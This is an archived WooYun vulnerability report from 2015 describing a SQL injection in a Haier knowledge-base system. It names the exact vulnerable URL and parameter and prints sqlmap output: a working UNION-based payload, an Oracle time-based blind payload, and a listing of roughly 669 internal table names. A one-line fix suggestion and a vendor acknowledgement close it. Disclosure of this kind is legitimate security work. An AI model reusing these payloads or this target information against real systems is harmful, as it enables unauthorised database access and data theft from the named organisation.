乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
海尔某系统存在SQL注入漏洞
http://esp.haier.com/km/kb_loglist.jsp?userno=-1+OR+17-7=10&flag=3userno参数存在注入
Place: GETParameter: userno Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: userno=-1 OR 17-7=10' UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(112)||CHR(111)||CHR(116)||CHR(113)||CHR(122)||CHR(69)||CHR(79)||CHR(84)||CHR(106)||CHR(119)||CHR(100)||CHR(69)||CHR(75)||CHR(66)||CHR(113)||CHR(107)||CHR(107)||CHR(112)||CHR(113),NULL,NULL,NULL FROM DUAL-- &flag=3 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: userno=-1 OR 17-7=10' AND 5046=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(99)||CHR(116)||CHR(116),5) AND 'wZuH'='wZuH&flag=3---web application technology: JSPback-end DBMS: OracleDatabase: ESP[669 tables]+--------------------------------+| TRANSLATION || ABCD || ACCIDENT_HAIER || ACVS || ACVS_BJLLFS || ACVS_BJZL || ACVS_BOMCWLX || ACVS_BOM_GD || ACVS_BUDGET_ADJUST || ACVS_BUDGET_BUSINESS || ACVS_BUDGET_MODEL || ACVS_BUDGET_TOTAL || ACVS_BUDGET_USE || ACVS_BUDGET_WARN || ACVS_BUSINESS || ACVS_BUSINESSTYPE || ACVS_BUSINESS_OPREASON || ACVS_CHARG || ACVS_CHECK_CASE || ACVS_CHECK_CATEGORY || ACVS_CHECK_FREQUENCY || ACVS_CHECK_MODULE || ACVS_CHECK_RISKCONSEQUENCES || ACVS_CHECK_RISKLEVEL || ACVS_CHECK_RISKRECOGNITION || ACVS_CHECK_RISKTYPE || ACVS_CJDM || ACVS_DATAFLOWBIND || ACVS_DATATABLE || ACVS_EMAILWAING_FLOWFILELD || ACVS_ENDFLOW || ACVS_FACTORY || ACVS_FAVORMENU || ACVS_FBS || ACVS_FIELD || ACVS_FLOWINFO || ACVS_FLOWLIST || ACVS_FLOWTABLES || ACVS_FLOW_AREA || ACVS_FLOW_MODEL || ACVS_FLOW_ORG || ACVS_FLOW_PUNISH || ACVS_FORM || ACVS_FORM_DATA || ACVS_FORM_DATA_DETAIL || ACVS_FORM_MASTER || ACVS_FXK || ACVS_GL_PIJL || ACVS_GL_PX || ACVS_JH_WFX || ACVS_KEYWORDFIELD || ACVS_LC_WDJS || ACVS_LES_AUART || ACVS_LES_KUNAG || ACVS_LES_KUNWE || ACVS_LES_SPART || ACVS_LES_VKORG || ACVS_LES_VTWEG || ACVS_LOGICBIND || ACVS_LPS_FX || ACVS_LPS_XDL || ACVS_MOVETYPE || ACVS_OPREASON || ACVS_ORDER_FACTORY || ACVS_PANDIAN || ACVS_PI_LUNDU || ACVS_PI_PTD || ACVS_PL_CGBZ || ACVS_PP_CJCB || ACVS_PP_DJLD || ACVS_PP_NEIWAIXIAO || ACVS_PP_PCZK || ACVS_PP_SHDDTZ || ACVS_PP_SHIBAIHUOWU || ACVS_PP_TEST || ACVS_PROCESS_GCH || ACVS_PROCESS_LDGC1 || ACVS_PROCESS_LDGONGCHANG || ACVS_PSI_YUNWEIXMJJ || ACVS_PSTYP || ACVS_PUNISH_PERSIONGW || ACVS_RATING_REMARK || ACVS_RATING_STRATEGY || ACVS_RECORD_NUMBER || ACVS_SOBKZ || ACVS_SRM_CGDSF || ACVS_SRM_KDPP || ACVS_STORAGE || ACVS_SUPPLIER || ACVS_TEST_001 || ACVS_TIMER_STATE || ACVS_TRANSACTION || ACVS_UNIT || ACVS_USERROLE || ACVS_USER_REMARK || ACVS_WARNNING || ACVS_WGG || ACVS_WORKFLOW_ORG || ACVS_XT_ZYXQ || ACVS_YS || AOTU_MSGLINK || API_MAIN || API_PARAMETER || APPAREALINK || APPORTDETAIL || APPORTMASTER || AREA || ASSET_CONTROL || ASSET_DEVICE || ASSET_DEVICE_STYLE || ASSET_INTF || ASSET_MANAGE || AUTOCLOSEDEMAND || AUTO_QUESTION || BAOBIAOSAP || BILLLIST || BPMPROJECTPOINT || BPMSTOESPREPORT || BPMSTOESPXMCY || CABAPPROVED || CMDB_CI_CISYS || CMDB_CI_INSTANCE_RELATION || CMDB_CI_PUBLIC_PROPERTY || CMDB_CI_RELATION || CMDB_DC_CTR || CMDB_DC_MAN || CMDB_DEV_ESPD_VARIANT || CMDB_DEV_SAP_TROBJ || CMDB_HW_EPS || CMDB_HW_ISS || CMDB_HW_RUT || CMDB_HW_STORAGE || CMDB_HW_SWT || CMDB_HW_TPL || CMDB_SW_DBS || CMDB_SW_K || CMDB_SW_MON || CMDB_SW_MWR || CMDB_SW_OPS || CMDB_SW_SEW || CMDB_SW_SMW || CMDB_SYS_BW || COCODE || COCODECOL || COPYSMDROLM || COPYSMMMNUA || COPYTRANSLATION || CUSTOMPRODUCT || DATE_WEEK_YEAR || DAY_CLEAR || DAY_CLEAR_PERMISSION || DEMANDPROJECT_PARTONE || DEMANDPROJECT_PARTTWO || DEMANDSUPPORTER || DEMANDTASK_SCORE || DEPARTMENT || DM_DATA_BIND || DM_TABEL_TESTA || DM_TABEL_TESTB || DM_TABEL_TESTC || DOCUMENTREPLYCONTENT || DOCUMENTSCORE || EAI_BUSINESSDOMAIN || EAI_INTERFACE || EAI_PEOPLE || EAI_TRAINING || EDITGROUP || EMAIL_REMINDER_CONFIG || ESP_MONITOR || ESP_MONITORYPOINTALERTMESSAGER || ESP_PORTAL_USERBM || ESP_PROXY_PERSON || EVENT_AVAILABLE || EVENT_DETAIL || EVENT_DOWN_UP || EVENT_THRESHOLD || EXPDETAIL || EXPMASTER || FLOWSYS || FLOW_CONFIG || FLOW_CONFIGURE || FLOW_SYS || GGDGGLA || GGDGGLB || GGDGGLOG || GROUPLEADER || HELPMESSAGE_INFO || HOPE_SMS || ID_SEED || INFO_AGE || INFO_PRO || INFO_PRO_BACK || INTEGRALLOG || INTEGRALMANAGER || INTEGRALRULE || ITIL_CI_WORKFLOW || JBPM_ACTION || JBPM_BYTEARRAY || JBPM_BYTEBLOCK || JBPM_COMMENT || JBPM_DECISIONCONDITIONS || JBPM_DELEGATION || JBPM_EVENT || JBPM_EXCEPTIONHANDLER || JBPM_FLOWSECURITY || JBPM_FLOWSECURITYDETAIL || JBPM_FLOWSTATE || JBPM_ID_GROUP || JBPM_ID_MEMBERSHIP || JBPM_ID_PERMISSIONS || JBPM_ID_USER || JBPM_JOB || JBPM_LOG || JBPM_MODULEDEFINITION || JBPM_MODULEINSTANCE || JBPM_NODE || JBPM_POOLEDACTOR || JBPM_PROCESSDEFINITION || JBPM_PROCESSINSTANCE || JBPM_RUNTIMEACTION || JBPM_SWIMLANE || JBPM_SWIMLANEINSTANCE || JBPM_TASK || JBPM_TASKACTORPOOL || JBPM_TASKCONTROLLER || JBPM_TASKINSTANCE || JBPM_TOKEN || JBPM_TOKENVARIABLEMAP || JBPM_TRANSITION || JBPM_VARIABLEACCESS || JBPM_VARIABLEINSTANCE || JBPM_WORKFLOWINFO || JBPM_WORKFLOWPROCESS || JBPM_WORKFLOWTABLE || JBPM_WORKFLOWTABLE_DET || JBPM_WORKFLOW_NODETIME || JIEKOUSAP || JOBSAP || KBCATALOG || KBCATALOG_DINGYUE || KBDATA || KBDATABAK || KBDATA_EDIT || KBDATA_HISTORY || KBFILETRANS || KBLINK || KB_COUNT || KB_MSGLINK || KB_MSGLINKBAK || KB_MSGLINK_BAK || KB_MSGLINK_BK || KB_MSKLINKBAK2 || KB_PUBLISH || KB_REPLY || KB_SCORE || KB_SHARE || KB_SYS_CLASSIFY || KB_USERLOOK || KDDATA_BK || KM_REPOSITORY || KPIDATE || KPIDEPT || KPIEMPLOYEE || KPIRULE || LEAMASTER || LEVELLOG || LINK_QUESTION || LIYP || LOGIN_LOG || LOGIN_LOG_USER || MAILFORHOLIDAYDUTY || MAILTASK || MANAGE_ASSET_GROUP || MANAGE_CALENDAR || MANAGE_EVENT_NAME || MANAGE_GROUP_TYPE || MANAGE_IFTYPE || MANAGE_MIBINFO || MANAGE_ORG_IP || MANAGE_SPEED || MANAGE_VENDOR || MANAGE_WORKDAY || MANAGE_WORKTIME || MC_COCKPIT_CONFIG || MC_EMAIL_REMINDER_CONFIG || MC_EMAIL_REMINDER_CONFIG_M || MC_EXP2MSG_REASON || MC_KPI_STANDARD || MC_LOG || MC_MESSAGE_EMAIL_REMINDER || MC_MESSAGE_EMAIL_REMINDER3 || MC_MSG_HISTORY || MC_NOMANYI_MSG || MC_OBJ_USER || MC_ROLE_OBJS || MC_SAP_USER_LOCK || MC_UPGRADEMSG_REASON || MC_USER_ROLE || MDM_USER || MD_ADDITIONAL_PROPERTIES || MD_CATALOGS || MD_COLUMNS || MD_CONNECTIONS || MD_CONSTRAINTS || MD_CONSTRAINT_DETAILS || MD_DERIVATIVES || MD_GROUPS || MD_GROUP_MEMBERS || MD_GROUP_PRIVILEGES || MD_INDEXES || MD_INDEX_DETAILS || MD_MIGR_DEPENDENCY || MD_MIGR_PARAMETER || MD_MIGR_WEAKDEP || MD_OTHER_OBJECTS || MD_PACKAGES || MD_PRIVILEGES || MD_PROJECTS || MD_REGISTRY || MD_REPOVERSIONS || MD_SCHEMAS || MD_SEQUENCES || MD_STORED_PROGRAMS || MD_SYNONYMS || MD_TABLES || MD_TABLESPACES || MD_TRIGGERS || MD_USERS || MD_USER_DEFINED_DATA_TYPES || MD_USER_PRIVILEGES || MD_VIEWS || MENUCOUNT || MENUCOUNT_BAK || MENUCOUNT_NEW || MESSAGE_EMAIL_REMINDER || MIGRATION_RESERVED_WORDS || MIGRLOG || MIGR_DATATYPE_TRANSFORM_MAP || MIGR_DATATYPE_TRANSFORM_RULE || MIGR_GENERATION_ORDER || MKTEST1 || MKTEST2 || MODLIST || MONITORLINK || MONITORPOINT || MONITORPOINT_VIEW || MONITORYPOINTALERTMESSAGER || MONITORYPOINTCURRENTMESSAGE || MONITOR_ALERT_FILTER || MONITOR_CURRENTVALUE || MONITOR_CURRENTVALUE_DEFAULT || MONITOR_DUTY_SCHEDULE || MONITOR_MACHINE_VIEW || MONITOR_RESPONSE || MONITOR_RESPOSITORY || MONITOR_TOOL || MONTIOR_CATALOG || MSGFLOW || MSGLINK || MSGMAIN || MSGMAIN_BAK || MSGMAIN_BEIZHU || MSGMAIN_MOBILE || MSGPRIORITY || MSGPRIORITY_NEW || MSGREPL || MSGSEARCH || MSGSUPCONFIG || MSGTYPE || MSG_CHULILV || MSG_COMPONENT || MSG_MISS_SLA || MSG_PRIORITY_DEF || MSG_REPORT_DEF || MSG_REPORT_META || MSG_TEMPLATE || MSG_WORKCALENDAR || MSG_WORKTYPE || MSKBLINK || MTOMLINK || NADEMAND_USER || OLD_PRO || ORDERINFO || ORGANIZATION || ORGEMPLOYEE || ORGLINK || ORGPOSITION || ORGVIRTUAL || OTDETAIL || OTMASTER || OVERTIMEMAILLOG || OWNUSER_MSG || PLAN_TABLE || PMDKPI || PMDMSGL || PMDPROJECT || PMDSCHEDULE || PMDTASK || PORTAL_DEPOT || PORTAL_KQ || PORTAL_USER || PRODUCT || PRODUCTMAIL || PRODUCT_GROUP || PRODUCT_KEFU || PRODUCT_MANAGER || PRODUCT_MANAGER_NEW || PRODUCT_SUBGROUP || PRODUCT_UP || PROJECTCHANGEROLE || PROJECTDOCUMENT || PROJECTNODE || PROJECTNODEBAK || PROJROLEUSER || PSILIST || PSI_ACC_MANAGE || PSI_ADJUSTMENT || PSI_BW || PSI_BW_CONNECT_TYPE || PSI_DC_EQUIPMENTA || PSI_DEMANDSHIFT_FLOWTYPE || PSI_DEMAND_SHIFT || PSI_DEMAND_SHIFT_EXAMINE || PSI_DEMAND_SHIFT_SA || PSI_DEVELOPER_KEY || PSI_DR || PSI_DRADDSUB || PSI_DRDESTORYSUB || PSI_DRMOVESUB || PSI_EAI_EXPLOIT || PSI_EAI_EXPLOIT_EXAMINE || PSI_ESPUPDATEMAIN || PSI_ESPUPDATESUB || PSI_ETL_EXPLOIT || PSI_EXPLOIT_CALSS2_EXAMINE || PSI_EXPLOIT_CLASS || PSI_EXPLOIT_CLASS2 || PSI_EXPLOIT_CLASS_EXAMINE || PSI_JZZYJYTBG || PSI_JZZYJYTBG_PG || PSI_LES_YJFH || PSI_MACHINEROOM || PSI_MACHINEROOM_MANAGER || PSI_MODULEUSER || PSI_PC_BATCH || PSI_PC_BATCHSUB1 || PSI_PC_CHANGE_PASSWORD || PSI_PC_SERVER_CHANGE || PSI_PC_SERVER_CHANGESUB1 || PSI_PC_SERVER_CHANGESUB2 || PSI_PC_SERVER_CHANGESUB3 || PSI_SAPBACK || PSI_SAPBACKSUB || PSI_SAPOPTION || PSI_SAP_CHANGE_CLASS || PSI_SAP_CHANGE_CLASS1 || PSI_SAP_CHANGE_CLASS2 || PSI_SAP_CHANGE_MANAGEMENT || PSI_SERVERSETUP || PSI_SERVER_LEADER || PSI_STOPPLAN || PSI_STOPPLAN_SUBTABLE || PSI_SYSTEM || PSI_SYSTEMMODULE || PSI_TRANSPORT || PSI_TRANSPORT2 || PURDETAIL || PURMASTER || QQUPLOAD_SLA || RECEIVE_MSG || RESDETAIL || RESMASTER || RPTLIST || SAP_BACKGROUND_JOB || SAP_BACKGROUND_JOB_BACKUP || SAP_CHANGE_MANAGEMENT_APPROVAL || SAP_CHANGE_MANAGEMENT_HANDLE || SAP_CPU || SAP_CPUMEM || SAP_CPU_UTILIZATION || SAP_DB_ACCESS || SAP_DOC_GENERATED || SAP_MEM || SAP_MEMORY_DATA || SAP_MEMORY_STATISTICS || SAP_NO_LOGIN_USER || SAP_ONLINE_USER || SAP_RFC_CLIENT || SAP_RFC_SERVER || SAP_SETTLE_STATISTICS || SAP_SPOOL_STATISTICS || SAP_SQL_REQUEST || SAP_SYSTEM_ERROR_MONITOR || SAP_TABLE_ACCESS || SAP_TABLE_INCREASEMENT || SAP_TABLE_SPACE_GROWTH || SAP_TIME_PROFILE || SAP_TOTAL_AMOUNT_OF_PRINT || SAP_TRANSACTION_PROFILE || SAP_USER_PROFILE || SAP_WORKLOAD_OVERVIEW || SAP_WORKLOAD_USER || SCHDULE || SCHDULEHEADER || SC_CO || SC_CODE || SC_CO_FORM || SC_CP || SC_LANG || SC_LOCK || SC_ORGANIZATION || SC_ORGPOSITION || SC_PARAMETER || SC_PARAMETER_BK || SC_PATCH || SC_POSITIONUSER || SC_RESOURCE || SC_SUBSCRIBE || SC_SUBSCRIBE_DEF || SC_SUBSCRIBE_PARAM || SC_SUP || SC_SUP_TASK || SC_SUP_TASK_CONTENT || SC_WIZARDREMINDER || SC_WK || SECONDLINE_INFO || SECONDLINE_TIMESUM || SECONDLINE_USER_CONFIG || SELFSAP || SEND_MSG || SERVERBINDGROUP || SERVERINFO || SERVER_MANAGES || SHY_BHZZJ || SHY_CXMS || SHY_GJC || SHY_JJCS || SHY_WTBH || SHY_WTC || SHY_YSWT || SLA_RANGE || SLA_RANGENO || SMDAREA || SMDATTA || SMDATTB || SMDBA || SMDCALENDAR || SMDGROUP || SMDICON || SMDJOBP || SMDLOGA || SMDLOGCONF || SMDMAILCFG || SMDMODELRELA || SMDPARS || SMDROLC || SMDROLE || SMDROLM || SMDROLP || SMDSAPSERVER || SMDSAPTASKHISTORY || SMDSERVER || SMDTASKLOG || SMDUDIF || SMDUGRP || SMDUSAP || SMDUSRA || SMDUSRA_TMP || SMDUSRO || SMDUSRO_20140307 || SMDUSRO_BK || SMDUSRP || SMDUSRR || SMDWORKFLOWSETTING || SMMACTA || SMMACTB || SMMACTC || SMMADK || SMMAUTH || SMMCODEF || SMMCOMP || SMMCOMP_EXT || SMMMNUA || SMMMNUP || SMMPARA || SMMRPTA || SMMRPTB || SMMTABL || SMMTASK || SMMVIEW || SMS_CALL || SMS_CONFIG || SMS_SEND_MSG || SMS_SEND_MSG_20121206 || SMS_TABLE_FIELD_CONFIG || SMTAUTH || SMTUMNU || SMTUROL || SM_ORG_CONFIG || STAFF_SUBGROUP || SUN_TALBE || SUPPORTER_FLOW || SUPPORTER_PERSON || SUPPORTER_SYS || SYN_SMMACTA || SYN_SMMACTB || SYN_TRANSLATION || SYS_TEMP_FBT || TABFLD || TABLE_CATOGORY || TABLE_SB || TABLE_TEST || TABMSG || TB || TCLOB || TEMP_PORTAL_USER_SYN || TEMP_SMDUSRA || TEST_SMDSAPSERVER || TREND_CPU || TREND_CPU_WORK || TREND_INTF || TREND_INTF_WORK || TREND_MEM || TREND_MEM_WORK || T_DATA || T_TMP || UNLOCKUSER || UPGRADEQUESTION || UPGRADEQUESTION_HISTORY || UPLOADACCOUNT || UPLOADACCOUNT_BF || UPLOADACCOUNT_NEW || UPLOADCATALOG || UPLOADCATAMOVE || UQ_EMAIL_REMINDER || USERADVISE || USERFAVORITES || USERINTEGRAL || USER_ACCOUNT || USER_DEFINED || USER_DEMANDLOCK || WFACTIVITY || WFHISTORY || WFPARTICIPANT || WFPROCESS || WFTRANSITION || WF_EXPENSE || WF_EXPENSE_PARTICULARS || WIN_MSGMAIN || WIZARD_CONFIG || WORKFLOW_SUCCEDANEUM || WORKPLAN || WORKREPORT || W_GROUP || X_MSGCODE || X_TABLESPACE || X_TMP || YEARHOLIDAY || ZENGQIANGSAP || Z_PLAN || Z_PROJECT || Z_PROPROGRESS || Z_PROQUERY || Z_STAGE || Z_TASK || Z_TASKPROGRESS || Z_TASKUPLOAD || Z_TASK_STATE || Z_TIME_TASK |+--------------------------------+
参数检查过滤
危害等级:中
漏洞Rank:8
确认时间:2015-10-19 16:56
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无
